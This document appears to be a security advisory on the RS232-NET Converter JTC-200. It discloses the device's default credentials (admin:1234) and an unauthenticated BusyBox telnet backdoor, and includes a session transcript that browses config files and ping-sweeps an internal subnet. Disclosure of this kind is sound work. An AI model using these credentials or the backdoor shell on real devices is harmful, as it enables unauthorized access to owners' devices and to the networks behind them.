RS232-NET Converter (model JTC-200) – Multiple vulnerabilities
- CHTD, Chunghwa Telecom Co., Ltd. (Taiwan)
- HiNet (Taiwan & China)
- PT Comunicacoes (Portugal)
- Sony Network Taiwan Limited (Taiwan)
- Vodafone Portugal (Portugal)
The RS232-NET Converter (model JTC-200) web administration interface uses non-random default credentials of admin:1234. The application does not enforce a mandatory password change. A network-based attacker can gain privileged access to a vulnerable device’s web management interfaces or leverage default credentials in remote attacks such as cross-site request forgery.
The RS232-NET Converter (model JTC-200) provides (undocumented) Busybox linux shell over Telnet service – without any authentication. This backdoor shell therefore gives direct access to the internal network, over the Internet.
Connected to IP.
Escape character is '^]'.
BusyBox v0.60.4 (2008.02.21-16:59+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
BusyBox v0.60.4 (2008.02.21-16:59+0000) multi-call binary
Usage: busybox [function] [arguments]...
or: [function] [arguments]...
BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use, and BusyBox will act like whatever it was invoked as.
Currently defined functions:
[, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls, mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi
bin dev etc nfs proc swap usb var
# cd etc
ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc resolv.conf services
# cat inetd.conf
telnet stream tcpnowait root /bin/telnetd
192.168.5.x -> real ip
# for i in `cat ip-list`; do ping 192.168.5.$i; done
192.168.5.11 is alive!
No response from 192.168.5.12
No response from 192.168.5.13
192.168.5.14 is alive!
192.168.5.15 is alive!